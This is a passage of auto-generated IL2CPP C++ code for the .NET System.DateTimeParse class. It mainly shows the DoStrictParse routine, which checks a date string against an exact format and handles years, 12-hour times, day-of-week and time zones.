= (bool)0; goto IL_005e; } IL_001d: { String_t* L_8 = ___format0; int32_t L_9 = ___pos1; int32_t L_10 = L_9; ___pos1 = ((int32_t)il2cpp_codegen_add((int32_t)L_10, (int32_t)1)); Il2CppChar L_11 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_8, L_10, /*hidden argument*/NULL); V_4 = L_11; Il2CppChar L_12 = V_4; Il2CppChar L_13 = V_2; if ((!(((uint32_t)L_12) == ((uint32_t)L_13)))) { goto IL_0034; } } { V_3 = (bool)1; goto IL_0062; } IL_0034: { Il2CppChar L_14 = V_4; if ((!(((uint32_t)L_14) == ((uint32_t)((int32_t)92))))) { goto IL_0055; } } { int32_t L_15 = ___pos1; int32_t L_16 = V_0; if ((((int32_t)L_15) >= ((int32_t)L_16))) { goto IL_0053; } } { StringBuilder_t * L_17 = ___result2; String_t* L_18 = ___format0; int32_t L_19 = ___pos1; int32_t L_20 = L_19; ___pos1 = ((int32_t)il2cpp_codegen_add((int32_t)L_20, (int32_t)1)); Il2CppChar L_21 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_18, L_20, /*hidden argument*/NULL); StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_17, L_21, /*hidden argument*/NULL); goto IL_005e; } IL_0053: { return (bool)0; } IL_0055: { StringBuilder_t * L_22 = ___result2; Il2CppChar L_23 = V_4; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_22, L_23, /*hidden argument*/NULL); } IL_005e: { int32_t L_24 = ___pos1; int32_t L_25 = V_0; if ((((int32_t)L_24) < ((int32_t)L_25))) { goto IL_001d; } } IL_0062: { bool L_26 = V_3; if (L_26) { goto IL_0067; } } { return (bool)0; } IL_0067: { int32_t* L_27 = ___returnValue3; int32_t L_28 = ___pos1; int32_t L_29 = V_1; *((int32_t*)L_27) = (int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_28, (int32_t)L_29)); return (bool)1; } } // System.Boolean System.DateTimeParse::DoStrictParse(System.String,System.String,System.Globalization.DateTimeStyles,System.Globalization.DateTimeFormatInfo,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_DoStrictParse_m404C0A9C38726E4B07EE689493F4BAFBEEA50E15 (String_t* ___s0, String_t* ___formatParam1, int32_t ___styles2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_DoStrictParse_m404C0A9C38726E4B07EE689493F4BAFBEEA50E15_MetadataUsageId); s_Il2CppMethodInitialized = true; } ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 V_0; memset(&V_0, 0, sizeof(V_0)); bool V_1 = false; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 V_2; memset(&V_2, 0, sizeof(V_2)); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 V_3; memset(&V_3, 0, sizeof(V_3)); int32_t V_4 = 0; ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * V_5 = NULL; bool V_6 = false; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * G_B35_0 = NULL; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * G_B34_0 = NULL; int32_t G_B36_0 = 0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * G_B36_1 = NULL; int32_t G_B46_0 = 0; { il2cpp_codegen_initobj((&V_0), sizeof(ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 )); ParsingInfo_Init_mCA35EA147545DA7A3AAEA2087D1F4E317353339A((ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 *)(&V_0), /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_0 = ___dtfi3; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_1 = DateTimeFormatInfo_get_Calendar_mFC8C8E19E118F8EE304B8C359E57EFD25EE2F862(L_0, /*hidden argument*/NULL); (&V_0)->set_calendar_0(L_1); int32_t L_2 = ___styles2; (&V_0)->set_fAllowInnerWhite_5((bool)((!(((uint32_t)((int32_t)((int32_t)L_2&(int32_t)4))) <= ((uint32_t)0)))? 1 : 0)); int32_t L_3 = ___styles2; (&V_0)->set_fAllowTrailingWhite_6((bool)((!(((uint32_t)((int32_t)((int32_t)L_3&(int32_t)2))) <= ((uint32_t)0)))? 1 : 0)); String_t* L_4 = ___formatParam1; int32_t L_5 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_4, /*hidden argument*/NULL); if ((!(((uint32_t)L_5) == ((uint32_t)1)))) { goto IL_0077; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_6 = ___result4; int32_t L_7 = L_6->get_flags_8(); if (!((int32_t)((int32_t)L_7&(int32_t)((int32_t)2048)))) { goto IL_0069; } } { String_t* L_8 = ___formatParam1; Il2CppChar L_9 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_8, 0, /*hidden argument*/NULL); if ((!(((uint32_t)L_9) == ((uint32_t)((int32_t)85))))) { goto IL_0069; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_10 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_10, 2, _stringLiteral3647A113CA9819A53C36BF6083C7027C975BE2B5, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0069: { String_t* L_11 = ___formatParam1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); String_t* L_13 = DateTimeParse_ExpandPredefinedFormat_m87CF9E69CC8E52C3D20A55D52FD3DFBBAAC1A44F(L_11, (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)(&___dtfi3), (ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 *)(&V_0), (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_12, /*hidden argument*/NULL); ___formatParam1 = L_13; } IL_0077: { V_1 = (bool)0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_14 = ___result4; ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_15 = V_0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_16 = L_15.get_calendar_0(); L_14->set_calendar_10(L_16); ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_17 = V_0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_18 = L_17.get_calendar_0(); int32_t L_19 = VirtFuncInvoker0< int32_t >::Invoke(7 /* System.Int32 System.Globalization.Calendar::get_ID() */, L_18); if ((!(((uint32_t)L_19) == ((uint32_t)8)))) { goto IL_00a8; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * L_20 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_m_hebrewNumberParser_0(); (&V_0)->set_parseNumberDelegate_8(L_20); (&V_0)->set_fCustomNumberParser_7((bool)1); } IL_00a8: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_21 = ___result4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_22 = ___result4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result4; int32_t L_24 = (-1); V_4 = L_24; L_23->set_Second_5(L_24); int32_t L_25 = V_4; int32_t L_26 = L_25; V_4 = L_26; L_22->set_Minute_4(L_26); int32_t L_27 = V_4; L_21->set_Hour_3(L_27); String_t* L_28 = ___formatParam1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_29 = ___dtfi3; __DTString__ctor_m9E9D21ACAC80CD2A8935D885767A9D7320A78FCF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), L_28, L_29, (bool)0, /*hidden argument*/NULL); String_t* L_30 = ___s0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_31 = ___dtfi3; __DTString__ctor_m9E9D21ACAC80CD2A8935D885767A9D7320A78FCF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_3), L_30, L_31, (bool)0, /*hidden argument*/NULL); ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_32 = V_0; bool L_33 = L_32.get_fAllowTrailingWhite_6(); if (!L_33) { goto IL_00f9; } } { __DTString_TrimTail_m23E23486D88B86A755B551A9881F1FDA9D6DD99A((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), /*hidden argument*/NULL); __DTString_RemoveTrailingInQuoteSpaces_m18A5B81964E3027BF02B1393CCD7781AB3ECA72F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), /*hidden argument*/NULL); __DTString_TrimTail_m23E23486D88B86A755B551A9881F1FDA9D6DD99A((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_3), /*hidden argument*/NULL); } IL_00f9: { int32_t L_34 = ___styles2; if (!((int32_t)((int32_t)L_34&(int32_t)1))) { goto IL_0136; } } { __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), /*hidden argument*/NULL); __DTString_RemoveLeadingInQuoteSpaces_m71E36820EEC9E50FFC1FA2F53FCFA3495EB2BC19((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), /*hidden argument*/NULL); __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_3), /*hidden argument*/NULL); goto IL_0136; } IL_0115: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_35 = V_0; bool L_36 = L_35.get_fAllowInnerWhite_5(); if (!L_36) { goto IL_0124; } } { __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_3), /*hidden argument*/NULL); } IL_0124: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_37 = ___dtfi3; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_38 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_39 = DateTimeParse_ParseByFormat_mA0F5500F7D2A3FF7BD1862671B4A12A0E9F66E30((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_3), (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), (ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 *)(&V_0), L_37, (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_38, /*hidden argument*/NULL); if (L_39) { goto IL_0136; } } { return (bool)0; } IL_0136: { bool L_40 = __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)(&V_2), /*hidden argument*/NULL); if (L_40) { goto IL_0115; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 L_41 = V_3; int32_t L_42 = L_41.get_Index_1(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 L_43 = V_3; String_t* L_44 = L_43.get_Value_0(); int32_t L_45 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_44, /*hidden argument*/NULL); if ((((int32_t)L_42) >= ((int32_t)((int32_t)il2cpp_codegen_subtract((int32_t)L_45, (int32_t)1))))) { goto IL_0164; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_46 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_46, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0164: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_47 = V_0; bool L_48 = L_47.get_fUseTwoDigitYear_4(); if (!L_48) { goto IL_01c6; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_49 = ___dtfi3; int32_t L_50 = DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731(L_49, /*hidden argument*/NULL); if (((int32_t)((int32_t)L_50&(int32_t)8))) { goto IL_01c6; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_51 = ___result4; int32_t L_52 = L_51->get_Year_0(); if ((((int32_t)L_52) < ((int32_t)((int32_t)100)))) { goto IL_0191; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_53 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_53, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0191: { } IL_0192: try { // begin try (depth: 1) DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_54 = ___result4; ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_55 = V_0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_56 = L_55.get_calendar_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_57 = ___result4; int32_t L_58 = L_57->get_Year_0(); int32_t L_59 = VirtFuncInvoker1< int32_t, int32_t >::Invoke(27 /* System.Int32 System.Globalization.Calendar::ToFourDigitYear(System.Int32) */, L_56, L_58); L_54->set_Year_0(L_59); goto IL_01c6; } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_01ad; throw e; } CATCH_01ad: { // begin catch(System.ArgumentOutOfRangeException) V_5 = ((ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA *)__exception_local); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_60 = ___result4; ArgumentOutOfRangeException_t94D19DF918A54511AEDF4784C9A08741BAD1DEDA * L_61 = V_5; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_60, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, L_61, /*hidden argument*/NULL); V_6 = (bool)0; goto IL_03ba; } // end catch (depth: 1) IL_01c6: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_62 = V_0; bool L_63 = L_62.get_fUseHour12_3(); if (!L_63) { goto IL_0239; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_64 = V_0; int32_t L_65 = L_64.get_timeMark_2(); if ((!(((uint32_t)L_65) == ((uint32_t)(-1))))) { goto IL_01df; } } { (&V_0)->set_timeMark_2(0); } IL_01df: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_66 = ___result4; int32_t L_67 = L_66->get_Hour_3(); if ((((int32_t)L_67) <= ((int32_t)((int32_t)12)))) { goto IL_01fa; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_68 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_68, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_01fa: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_69 = V_0; int32_t L_70 = L_69.get_timeMark_2(); if (L_70) { goto IL_0217; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_71 = ___result4; int32_t L_72 = L_71->get_Hour_3(); if ((!(((uint32_t)L_72) == ((uint32_t)((int32_t)12))))) { goto IL_0270; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_73 = ___result4; L_73->set_Hour_3(0); goto IL_0270; } IL_0217: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_74 = ___result4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_75 = ___result4; int32_t L_76 = L_75->get_Hour_3(); G_B34_0 = L_74; if ((((int32_t)L_76) == ((int32_t)((int32_t)12)))) { G_B35_0 = L_74; goto IL_0230; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_77 = ___result4; int32_t L_78 = L_77->get_Hour_3(); G_B36_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_78, (int32_t)((int32_t)12))); G_B36_1 = G_B34_0; goto IL_0232; } IL_0230: { G_B36_0 = ((int32_t)12); G_B36_1 = G_B35_0; } IL_0232: { G_B36_1->set_Hour_3(G_B36_0); goto IL_0270; } IL_0239: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_79 = V_0; int32_t L_80 = L_79.get_timeMark_2(); if (L_80) { goto IL_024c; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_81 = ___result4; int32_t L_82 = L_81->get_Hour_3(); if ((((int32_t)L_82) >= ((int32_t)((int32_t)12)))) { goto IL_0260; } } IL_024c: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_83 = V_0; int32_t L_84 = L_83.get_timeMark_2(); if ((!(((uint32_t)L_84) == ((uint32_t)1)))) { goto IL_0270; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_85 = ___result4; int32_t L_86 = L_85->get_Hour_3(); if ((((int32_t)L_86) >= ((int32_t)((int32_t)12)))) { goto IL_0270; } } IL_0260: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_87 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_87, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0270: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_88 = ___result4; int32_t L_89 = L_88->get_Year_0(); if ((!(((uint32_t)L_89) == ((uint32_t)(-1))))) { goto IL_0290; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_90 = ___result4; int32_t L_91 = L_90->get_Month_1(); if ((!(((uint32_t)L_91) == ((uint32_t)(-1))))) { goto IL_0290; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_92 = ___result4; int32_t L_93 = L_92->get_Day_2(); G_B46_0 = ((((int32_t)L_93) == ((int32_t)(-1)))? 1 : 0); goto IL_0291; } IL_0290: { G_B46_0 = 0; } IL_0291: { V_1 = (bool)G_B46_0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_94 = ___result4; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** L_95 = (&V_0)->get_address_of_calendar_0(); int32_t L_96 = ___styles2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_97 = DateTimeParse_CheckDefaultDateTime_mE0B8DBAE34A78D6A4E4B7FA6660929CA67EB3478((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_94, (Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 **)L_95, L_96, /*hidden argument*/NULL); if (L_97) { goto IL_02a5; } } { return (bool)0; } IL_02a5: { bool L_98 = V_1; if (L_98) { goto IL_02e6; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_99 = ___dtfi3; bool L_100 = DateTimeFormatInfo_get_HasYearMonthAdjustment_m638241B02A89164978FE5DF2BB3E1FD1C3DC7BCD(L_99, /*hidden argument*/NULL); if (!L_100) { goto IL_02e6; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_101 = ___dtfi3; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_102 = ___result4; int32_t* L_103 = L_102->get_address_of_Year_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_104 = ___result4; int32_t* L_105 = L_104->get_address_of_Month_1(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_106 = ___result4; int32_t L_107 = L_106->get_flags_8(); bool L_108 = DateTimeFormatInfo_YearMonthAdjustment_mEEF9F16403B844B1E733A88933C24281813EAC92(L_101, (int32_t*)L_103, (int32_t*)L_105, (bool)((!(((uint32_t)((int32_t)((int32_t)L_107&(int32_t)((int32_t)1024)))) <= ((uint32_t)0)))? 1 : 0), /*hidden argument*/NULL); if (L_108) { goto IL_02e6; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_109 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_109, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_02e6: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_110 = V_0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_111 = L_110.get_calendar_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_112 = ___result4; int32_t L_113 = L_112->get_Year_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_114 = ___result4; int32_t L_115 = L_114->get_Month_1(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_116 = ___result4; int32_t L_117 = L_116->get_Day_2(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_118 = ___result4; int32_t L_119 = L_118->get_Hour_3(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_120 = ___result4; int32_t L_121 = L_120->get_Minute_4(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_122 = ___result4; int32_t L_123 = L_122->get_Second_5(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_124 = ___result4; int32_t L_125 = L_124->get_era_7(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_126 = ___result4; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_127 = L_126->get_address_of_parsedDate_11(); bool L_128 = VirtFuncInvoker9< bool, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * >::Invoke(22 /* System.Boolean System.Globalization.Calendar::TryToDateTime(System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.DateTime&) */, L_111, L_113, L_115, L_117, L_119, L_121, L_123, 0, L_125, (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_127); if (L_128) { goto IL_033c; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_129 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_129, 4, _stringLiteral3908AA3BFE204D9D04F695379736F7C93792A7E9, NULL, /*hidden argument*/NULL); return (bool)0; } IL_033c: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_130 = ___result4; double L_131 = L_130->get_fraction_6(); if ((!(((double)L_131) > ((double)(0.0))))) { goto IL_0378; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_132 = ___result4; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_133 = ___result4; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * L_134 = L_133->get_address_of_parsedDate_11(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_135 = ___result4; double L_136 = L_135->get_fraction_6(); IL2CPP_RUNTIME_CLASS_INIT(Math_tFB388E53C7FDC6FCCF9A19ABF5A4E521FBD52E19_il2cpp_TypeInfo_var); double L_137 = bankers_round(((double)il2cpp_codegen_multiply((double)L_136, (double)(10000000.0)))); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_138 = DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)L_134, (((int64_t)((int64_t)L_137))), /*hidden argument*/NULL); L_132->set_parsedDate_11(L_138); } IL_0378: { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_139 = V_0; int32_t L_140 = L_139.get_dayOfWeek_1(); if ((((int32_t)L_140) == ((int32_t)(-1)))) { goto IL_03ab; } } { ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_141 = V_0; int32_t L_142 = L_141.get_dayOfWeek_1(); ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 L_143 = V_0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_144 = L_143.get_calendar_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_145 = ___result4; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_146 = L_145->get_parsedDate_11(); int32_t L_147 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(12 /* System.DayOfWeek System.Globalization.Calendar::GetDayOfWeek(System.DateTime) */, L_144, L_146); if ((((int32_t)L_142) == ((int32_t)L_147))) { goto IL_03ab; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_148 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_148, 2, _stringLiteralA2B7B795445D4C0C91BF05E16188082D950BF16F, NULL, /*hidden argument*/NULL); return (bool)0; } IL_03ab: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_149 = ___result4; int32_t L_150 = ___styles2; bool L_151 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_152 = DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_149, L_150, L_151, /*hidden argument*/NULL); if (L_152) { goto IL_03b8; } } { return (bool)0; } IL_03b8: { return (bool)1; } IL_03ba: { bool L_153 = V_6; return L_153; } } // System.Exception System.DateTimeParse::GetDateTimeParseException(System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR Exception_t * DateTimeParse_GetDateTimeParseException_m26091CD2EBBFFEA867F71D3910742714FF38F733 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method 